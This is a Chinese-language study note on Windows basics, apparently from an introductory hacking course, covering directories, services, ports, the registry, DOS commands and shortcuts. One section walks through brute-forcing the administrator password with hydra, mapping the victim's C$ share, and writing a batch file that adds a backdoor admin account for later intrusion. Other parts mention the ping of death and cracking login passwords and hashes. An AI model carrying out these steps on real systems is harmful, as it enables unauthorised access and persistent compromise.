一、Windows基础

系统目录，服务，端口，注册表

系统目录

• Windows：系统所在的目录
  • System32：用来存放系统的配置文件
  • SAM文件：用来存放账户密码的文件
  • host文件：用来解析域名
• Program files：默认的64位程序安装目录
• Program files（x86）：默认的32位程序安装目录
• 用户：用来存储用户的配置文件或者用户的个人信息
• PerfLogs：系统日志目录，存放系统日志

服务

服务是一种应用程序类型，它在后台运行，服务应用程序通常可以在本地和通过网络为用户提供一些功能

• 服务决定了计算机的一些功能是否被启用
• 不同的服务对应的功能不同
• 通过计算机提供的服务可以有效的实现资源共享

打开服务

• 右击我的电脑打开“计算机管理”
• Win + r 打开运行，输入 services.msc 回车打开

常见的服务

• web服务
• dns服务：解析域名
• DHCP服务：给客户端分发IP
• 邮件服务：分发邮件
• telnet服务：用于远程登录
• ssh服务：和telnet一样，但是ssh是加密的连接
• ftp服务：上传下载服务
• smb服务：文件共享服务

端口

用来区分不同的服务

端口的分类

端口分为三种类型：公认端口，注册端口，动态/私有端口

常见的端口

• HTTP协议代理服务器常用端口：80/8080/3128/8081/9080
• FTP(文件传输协议)：21
• Telnet(远程登录协议)：23
• TFTP(简单文件传输协议)：69/udp
• SSH(安全登录),SCP(文件传输),端口重定向,默认端口为：22/tcp
• SMTP(邮件传输协议)：25/tcp
• POP3：110/tcp
• TOMCAT：8080
• win2003远程登录：3389
• Oracle数据库：1521
• MS SQL SERVER数据库server：1433/tcp,1433/udp
• Mysql数据库：3306
• QQ：1080/udp
• WebSphere等：9090

黑客可以通过端口进行

• 信息收集
• 目标探测
• 服务判断
• 系统判断
• 系统角色分析

注册表

系统相当于身体，注册表相当于经络，通过注册表可以修改系统的任何部分

• 打开注册表： 打开运行，输入 regedit ，然后回车即可打开注册表
• 注册表的作用： 注册表是系统的核心数据库，在整个系统中起着核心作用，可以通过注册表来修改系统的任何配置
• 注册表的结构：
  • HKEY_CLASSES_ROOT：管理文件系统
  • HKEY_CURRENT_USER：管理系统当前的用户信息
  • HKEY_LOCAL_MACHINE：管理系统当前的硬件配置
  • HKEY_USERS：管理系统用户信息
  • HKEY_CURRENT_CONFIG：管理当前用户的系统配置

常用的DOS命令批处理文件的编写

• color：改变cmd颜色
• ping -t -l 65500 ip 死亡之ping
  • ttl值默认为64，每经过一个路由ttl值就会减1
• ipconfig：查看IP
• ipconfig /release 释放IP地址
• ipconfig /renew 重新获取IP
• systeminfo：查看系统信息
• arp -a：显示同一个接口下同一个网段的IP地址
• net view：查看局域网内的其他计算机的计算机名
• shutdown -s -t 时间：关闭计算机
• dir：查看目录
• cd：切换目录
• start www.baidu.com：打开网页
• copy con c:\123.txt：创建文件
• ctrl + z：回车
• type 123.txt：打开文件（在命令行打开）
• start 123.txt：打开文件（使用记事本）
• md 目录名：创建目录
• rd 123：删除空目录
• ren 原文件名 新文件名：重命名文件
• del：删除文件
• copy：复制文件
• move：移动文件
• tree：以树形显示文件夹结构
• telnet：远程登录
• net use k: \192.168.1.1\c$
• net use k: \192.168.1.1\c$ /del
• net start：查看开启了那些服务
• net start 服务名：开启服务（net start ）
• net stop 服务名：停止服务
• net user 用户名 密码 /add：建立用户
• net user guest/active:yes：激活来宾账户
• net user：查看有哪些用户
• net user 账户名：查看账户的属性
• net local Group administrators 用户名 /add：把用户添加到管理员中使其具有管理员权限，注意 administrator后加 s 用复数
• net user guest 12345：用guest用户登录后将密码改为12345
• net password 密码：更改系统登录密码
• net share：查看本地开启的共享
• net share ip$：开启ip$共享
• net share ip$ /del：删除ip$共享
• net share c$ /del：删除c:共享
• netstat -a：查看开启了哪些端口
• netstat -n：查看端口的网络连接情况
• netstat -v：查看正在进行的工作
• at id号：开启已注册的某一个计划任务 （win10的at命令已经被弃用，改用schtasks.exe ）
• at /delete：停止所有计划任务，用参数/yes则不需要确认就直接停止
• at id号 /delete：停止某一个已注册的计划任务
• at：查看所有计划任务
• attrib 文件名(目录名)：查看某文件(目录)的属性
• attrib 文件名 -A -R -S -H 或 +A +R +S +H：去掉(添加)某文档的 存储，只读，系统，隐藏属性;用 + 则是添加为某属性
• tasklist 查看当前正在运行进程
• taskkill /im cmd.exe /f 通过进程名称关闭进程，/f强制执行
• taskkill /pid 进程号 /f 通过进程号关闭进程

批处理文件

• 批处理文件就是dos命令的组合文件，写在批处理文件的命令会被逐一执行
• 后缀名为 .bat

使用 hydra 工具对系统进行破解

命令：

hydra.exe -l administrator -P pass.txt sub

回车之后显示破解结果

破解之后可以映射对方的磁盘：

net use k: \192.168.80.128\c$

之后可以通过批处理文件创建一个新的账户方便下一次入侵：

copy con c:\123.bat net user cracer 123456 /add net localgroup administrators cracer /add shutdown -s -t 180

然后将写好的批处理文件放到指定的目录中

常用的快捷键以及如何优化系统

• F1：显示当前系统程序或者Windows的帮助内容
• F2：当你选中一个文件的话，这意味着重名名
• F3：当你在桌面上的时候是打开“查找：所有文件“ 对话框
• CTRL+F4：关闭当前应用程序中的当前文本（如word中）
• F5：刷新
• CTRL+F5：强行刷新
• CTRL+F6：切换到当前应用程序中的下一个文本（加 shift 可以跳到前一个窗口）
• F10或者ALT：激活当前程序的菜单栏
• Windows键或者CTRL+ESC：打开开始菜单
• CTRL+ALT+Delete：在win9x中打开关闭程序对话框
• Delete：删除被选择的选择项目，如果是文件，将被放入回收站
• Shift+Delete：删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站
• CTRL+N：新建一个新的文件
• CTRL+O：打开“打开文件对话框”
• CTRL+P：打开“打印”对话框
• CTRL+S：保存当前操作的文件
• CTRL+X：剪切
• CTRL+Insert 或者 CTRL+C：复制
• Shift+Insert 或者 CTRL+V：粘贴
• ALT+Backspace 或 CTRL+Z：撤销上一步的操作
• ALT+Shift+Backspace：重复上一步被撤销的操作
• ALT+Tab：在任务栏上的按钮间循环
• Windows键+M：最小化所有被打开的窗口
• Windows键+CTRL+M：重新将恢复上一项操作前的窗口的大小和位置
• Windows键+E：打开资源管理器
• Windows键+F：打开“查找：所有文件”对话框
• Windows键+R：打开“运行”对话框
• Windows键+L：锁屏
• Windows键+D：最小化所有窗口，在按一下恢复
• Windows键+Break：显示“系统属性”对话框

系统优化

• 修改启动项
  • 在“运行”窗口中输入“msconfig”命令，打开系统配置窗口后找到“启动”选项
• 加快系统运行速度
  • 在“运行”窗口中输入“msconfig”命令，打开系统配置窗口后找到“引导”选项
  • 点击“高级选项”此时就可以看到我们要修改的设置项了
• 提高窗口切换提速
  • 右击计算机属性–性能信息和工具—调整视觉效果
  • 先点击然Windows选择计算机的最佳设置—在点击自定义—把最后的勾选去掉–确定

登录密码破解，手动清除木马病毒

• 使用启动U盘破解
  • 下载U盘启动盘制作工具
  • 修改BIOS为U盘优先启动
  • 进入PE选择登录密码破解，回车
  • 选择清除Windows登录密码
  • 选择要清除的用户
  • 按“Y键”确定清除
• 使用工具对hash值破解
  • lc5
  • 彩虹表

手动清除木马

• 查找开机启动项
• 查询服务
• 查看网络端口连接

配置黑客桌面，工作环境

• 雨滴桌面